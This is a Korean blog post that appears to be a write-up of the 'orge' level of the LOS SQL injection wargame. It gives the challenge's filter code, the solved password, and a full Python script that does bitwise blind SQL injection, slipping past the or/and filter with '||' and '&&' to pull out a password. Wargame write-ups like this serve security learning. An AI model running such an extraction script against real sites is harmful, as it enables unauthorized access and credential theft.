-
LOS - orge / level 7Web/SQLI 2024. 6. 23. 19:14
문제
풀이 과정
if(preg_match('/prob|_|\.|\(\)/i', $_GET[pw])) exit("No Hack ~_~");
if(preg_match('/or|and/i', $_GET[pw])) exit("HeHe");pw의 값에 or / and를 필터링 하는 것을 볼 수 있다
또한 admin의 진짜 pw값을 넣으면 문제가 풀린다
이를 통해 blind sql injection을 수행한다
정답
더보기?pw=7b751aec
활용 코드
python requests를 이용하여 코드를 작성하여 문제를 해결하였다
import requests url = "input your url" # cookie = {input your cookie} # user = 'input find user' # def change_bit(array): two_bit_array = [] for i in range(len(array)): two_bit_array.append(int(array[i],2)) return two_bit_array def change_str(array): str_array = [] result_str = "" for i in range(len(array)): str_array.append(chr(array[i])) result_str = result_str + str_array[i] return result_str def find_length(url,user,cookie): i = 1 while True: params = f"?pw=%27%20||%20id=%27{user}%27%20%26%26%20length(pw) > {i}%23" send_url = url + params print(f"Params = {params}") res = requests.get(send_url, cookies=cookie) # print(res.text) if "Hello admin" not in res.text: break i += 1 print(f"{user} Length = {i}") return i def blind(url, user, cookie,length): results = [] for i in range(1, length+1): k = 2 result = "" for count in range(8): go = k ** count params = f"?pw=%27%20||%20id=%27{user}%27%20%26%26%20ascii(substr(pw,{i},1)) %26 {go}%23" send_url = url + params res = requests.get(send_url,cookies=cookie) if "Hello admin" in res.text: result = "1" + result else: result = "0" + result print(f"{i} : {result}") results.append(result) two_bit_array = change_bit(results) result_str = change_str(two_bit_array) return result_str print("Find User Length") length = find_length(url,user, cookie) array = blind(url,user, cookie, length) print(array)
'Web > SQLI' 카테고리의 다른 글
LOS - vampire / level 9 (0) 2024.06.23 LOS - troll / level 8 (0) 2024.06.23 LOS - darkelf / level 6 (0) 2024.06.23 LOS - wolfman / level 5 (0) 2024.06.23 LOS - orc / level 4 (0) 2024.06.21